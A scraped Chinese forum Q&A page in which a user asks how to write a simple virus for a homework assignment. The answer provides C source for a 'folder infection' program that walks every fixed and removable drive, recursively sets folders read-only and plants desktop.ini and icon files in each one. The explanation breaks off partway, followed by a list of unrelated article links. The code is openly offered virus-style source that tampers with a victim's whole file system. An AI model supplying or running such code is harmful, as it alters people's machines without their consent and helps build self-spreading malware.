MyException - 我的异常网
当前位置:我的异常网» Windows » 编写病毒解决方案

编写病毒解决方案

www.MyException.Cn  网友分享于:2013-02-08  浏览:18次
编写病毒
请高手教我如何编写简单的病毒,最好用c/c++或java语言,只是为了完成作业,不会危害他人,谢谢

------解决方案--------------------
这里是个文件夹感染的范例程序,其实很简单,当然强大功能的病毒或木马远比这要复杂很多,看些书吧,windows核心编程,网络编程,加上黑客防线编程板块的那些内容就可以了。
 实现原理与步骤 
修改文件夹图标的方法就是 在文件夹中放入两个文件,它们分别是 Desktop.ini 和 一个ico文件然后在Desktop.ini中写入如下内容 
[.ShellClassInfo] 
IconFile=GouGe.ico 
IconIndex=0 
其中GouGe.ico就是你要显示的文件夹图标了这个名字是可以改的,主要步骤分为1.枚举磁盘2.枚举目录3.进行感染总的来说就是这3步了 
下面开始一个一个解析 
1.枚举磁盘 
int APIENTRY WinMain(HINSTANCE hInstance, 
HINSTANCE hPrevInstance, 
LPSTR lpCmdLine, 
int nCmdShow) 

for(char i='A';i<='Z';i++) 

char x[20]={i,':'}; 
UINT Type=GetDriveType(x); 
if(Type==DRIVE_FIXED||Type==DRIVE_REMOVABLE)//取硬盘和移动磁盘 

EnumDirectory(x);//进行感染 此函数下面介绍 


return 0; 

2.枚举目录 
bool EnumDirectory(TCHAR *dirpath) 

WIN32_FIND_DATA fd; 
TCHAR szTempFileFind[MAX_PATH] = { 0 }; 
bool bIsFinish = false; 
ZeroMemory(&fd, sizeof(WIN32_FIND_DATA)); 
wsprintf(szTempFileFind, "%s\\*.*", dirpath); 
HANDLE hFind = FindFirstFile(szTempFileFind, &fd); 
if (hFind == INVALID_HANDLE_VALUE) 

return false; 

while (!bIsFinish) 

bIsFinish = (FindNextFile(hFind, &fd)) ? false : true; 
if ((strcmp(fd.cFileName, ".") != 0) && (strcmp(fd.cFileName, "..") != 0)) 

TCHAR szFoundFileName[MAX_PATH] = { 0 }; 
strcpy(szFoundFileName, fd.cFileName); 
if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) 

TCHAR szTempDir[MAX_PATH] = { 0 }; 
wsprintf(szTempDir, "%s\\%s", dirpath, szFoundFileName); 
Sleep(10); 
inject(szTempDir);//进行感染 此函数下面介绍 
EnumDirectory(szTempDir);//递归调用 



FindClose(hFind); 
return 0; 

此函数主要使用递归调用的方法对指定目录进行枚举,并感染,如果是文件则跳过 
3.进行感染 
void inject(char* path) 

char inifilepath[256]; 
char icofilepath[256]; 
strcpy(inifilepath,path); 
strcpy(icofilepath,path); 
strcat(inifilepath,"\\desktop.ini"); 
strcat(icofilepath,"\\LengFeng.ico"); 
WriteResourceToFile(icofilepath);//生成ICO文件 此函数下面介绍 
SetFileAttributes(path,FILE_ATTRIBUTE_READONLY); 
WritePrivateProfileString(".ShellClassInfo","IconFile","LengFeng.ico",inifilepath);//写入INI 
WritePrivateProfileString(".ShellClassInfo","IconIndex","0",inifilepath);//写入INI 

此函数负责把ICO和INI文件写入指定目录ICO文件是由资源的方式加载并生成的,而INI文件则是动态写入的 
4.生成ICO文件 
bool WriteResourceToFile(char const *filename) 

HINSTANCE hInstance=GetModuleHandle(NULL); 
HRSRC hResInfo = FindResource(hInstance, MAKEINTRESOURCE(ID_ICO),MAKEINTRESOURCE(RC_BINARYTYPE)); 
HGLOBAL hgRes = LoadResource(hInstance, hResInfo); 
void *pvRes = LockResource(hgRes); 
DWORD cbRes = SizeofResource(hInstance, hResInfo); 
HANDLE hFile = CreateFile(filename, GENERIC_WRITE, 0, 0, CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL, 0); 
DWORD cbWritten; 
WriteFile(hFile, pvRes, cbRes, &cbWritten, 0); 
CloseHandle(hFile); 
return false; 

此函数中ID_ICO与RC_BINARYTYPE是自己定义的它们分别代码资源名称和资源类型 因为ICO是以资源的方式加载的那么如何在SDK的程序中 
加载资源呢?请看下面的实现
 5.SDK中加载资源 
如果你使用了VC或者BCB又或DELPHI那么可以直接导入,但在VC中的SDK程序中是没有这个功能的,所以我们要自己实现 
首先新建一个名为resource.h的头文件并输入 

文章评论

Web开发者需具备的8个好习惯
Web开发者需具备的8个好习惯
不懂技术不要对懂技术的人说这很容易实现
不懂技术不要对懂技术的人说这很容易实现
我是如何打败拖延症的
我是如何打败拖延症的
程序员眼里IE浏览器是什么样的
程序员眼里IE浏览器是什么样的
为什么程序员都是夜猫子
为什么程序员都是夜猫子
亲爱的项目经理,我恨你
亲爱的项目经理,我恨你
鲜为人知的编程真相
鲜为人知的编程真相
看13位CEO、创始人和高管如何提高工作效率
看13位CEO、创始人和高管如何提高工作效率
科技史上最臭名昭著的13大罪犯
科技史上最臭名昭著的13大罪犯
总结2014中国互联网十大段子
总结2014中国互联网十大段子
我的丈夫是个程序员
我的丈夫是个程序员
十大编程算法助程序员走上高手之路
十大编程算法助程序员走上高手之路
Java 与 .NET 的平台发展之争
Java 与 .NET 的平台发展之争
 程序员的样子
程序员的样子
那些争议最大的编程观点
那些争议最大的编程观点
旅行,写作,编程
旅行,写作,编程
代码女神横空出世
代码女神横空出世
60个开发者不容错过的免费资源库
60个开发者不容错过的免费资源库
5款最佳正则表达式编辑调试器
5款最佳正则表达式编辑调试器
程序员都该阅读的书
程序员都该阅读的书
每天工作4小时的程序员
每天工作4小时的程序员
老美怎么看待阿里赴美上市
老美怎么看待阿里赴美上市
一个程序员的时间管理
一个程序员的时间管理
写给自己也写给你 自己到底该何去何从
写给自己也写给你 自己到底该何去何从
什么才是优秀的用户界面设计
什么才是优秀的用户界面设计
Web开发人员为什么越来越懒了?
Web开发人员为什么越来越懒了?
程序员周末都喜欢做什么?
程序员周末都喜欢做什么?
程序员最害怕的5件事 你中招了吗?
程序员最害怕的5件事 你中招了吗?
为啥Android手机总会越用越慢?
为啥Android手机总会越用越慢?
如何成为一名黑客
如何成为一名黑客
“肮脏的”IT工作排行榜
“肮脏的”IT工作排行榜
做程序猿的老婆应该注意的一些事情
做程序猿的老婆应该注意的一些事情
Java程序员必看电影
Java程序员必看电影
聊聊HTTPS和SSL/TLS协议
聊聊HTTPS和SSL/TLS协议
当下全球最炙手可热的八位少年创业者
当下全球最炙手可热的八位少年创业者
程序员和编码员之间的区别
程序员和编码员之间的区别
我跳槽是因为他们的显示器更大
我跳槽是因为他们的显示器更大
程序员必看的十大电影
程序员必看的十大电影
漫画:程序员的工作
漫画:程序员的工作
团队中“技术大拿”并非越多越好
团队中“技术大拿”并非越多越好
如何区分一个程序员是“老手“还是“新手“?
如何区分一个程序员是“老手“还是“新手“?
程序员的鄙视链
程序员的鄙视链
10个调试和排错的小建议
10个调试和排错的小建议
10个帮程序员减压放松的网站
10个帮程序员减压放松的网站
老程序员的下场
老程序员的下场
软件开发程序错误异常ExceptionCopyright © 2009-2015 MyException 版权所有